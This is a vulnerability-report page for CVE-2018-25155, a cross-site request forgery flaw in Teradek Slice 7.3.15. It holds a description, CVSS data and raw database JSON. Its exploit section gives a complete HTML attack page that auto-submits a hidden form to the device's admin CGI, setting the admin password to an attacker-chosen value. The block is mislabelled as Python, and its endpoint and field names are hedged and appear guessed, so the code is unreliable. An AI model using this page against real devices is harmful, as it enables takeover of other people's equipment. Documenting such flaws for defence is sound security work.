Security Vulnerability Report
中文
CVE-2018-25155 CVSS 4.3 MEDIUM

CVE-2018-25155

Published: 2025-12-24 20:15:50
Last Modified: 2026-01-26 16:15:54

Description

Teradek Slice 7.3.15 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft a malicious web page that automatically submits password change requests to the device when a logged-in user visits the page.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:teradek:slice_firmware:7.3.15:build31735:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:teradek:slice:2.1:*:*:*:*:*:*:* - NOT VULNERABLE
Teradek Slice < 7.3.15 (受影响版本)
Teradek Slice 7.3.15 (确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2018-25155 - Teradek Slice Password Change --> <!-- This PoC demonstrates how an attacker can change the admin password via CSRF attack --> <!DOCTYPE html> <html> <head> <title>Teradek Slice CSRF PoC - CVE-2018-25155</title> <style> body { font-family: Arial, sans-serif; padding: 20px; } .info { background: #e3f2fd; padding: 15px; border-radius: 5px; margin: 10px 0; } .hidden { display: none; } </style> </head> <body> <div class="info"> <h2>CVE-2018-25155 PoC</h2> <p>This PoC demonstrates the CSRF vulnerability in Teradek Slice 7.3.15</p> <p>Target: Teradek Slice device with default or known admin session</p> </div> <!-- Hidden form that auto-submits password change request --> <form id="csrfForm" action="http://[TERADEK_IP]/cgi-bin/admin.cgi" method="POST" class="hidden"> <!-- Authentication token (may not be validated server-side) --> <input type="hidden" name="token" value="any_value"> <!-- Password change action --> <input type="hidden" name="action" value="password_change"> <!-- New admin password set by attacker --> <input type="hidden" name="new_password" value="PwnedByAttacker123"> <!-- Confirm new password --> <input type="hidden" name="confirm_password" value="PwnedByAttacker123"> <!-- Admin username --> <input type="hidden" name="username" value="admin"> </form> <script> // Auto-submit the form when page loads window.onload = function() { console.log('[CVE-2018-25155] CSRF PoC loaded, submitting form...'); document.getElementById('csrfForm').submit(); }; </script> <div class="info"> <p><strong>Note:</strong> For educational and security testing purposes only.</p> <p>Replace [TERADEK_IP] with the actual IP address of the target Teradek Slice device.</p> </div> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25155", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:50.430", "lastModified": "2026-01-26T16:15:53.777", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Teradek Slice 7.3.15 contains a cross-site request forgery vulnerability that allows attackers to change administrative passwords without proper request validation. Attackers can craft a malicious web page that automatically submits password change requests to the device when a logged-in user visits the page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:teradek:slice_firmware:7.3.15:build31735:*:*:*:*:*:*", "matchCriteriaId": "0EB39274-4DEE-4D3C-BA35-341E3CB72FAA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:teradek:slice:2.1:*:*:*:*:*:*:*", "matchCriteriaId": "E1C3DAF3-43E0-4E55-A10B-07011FEE0829"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44676", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.teradek.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}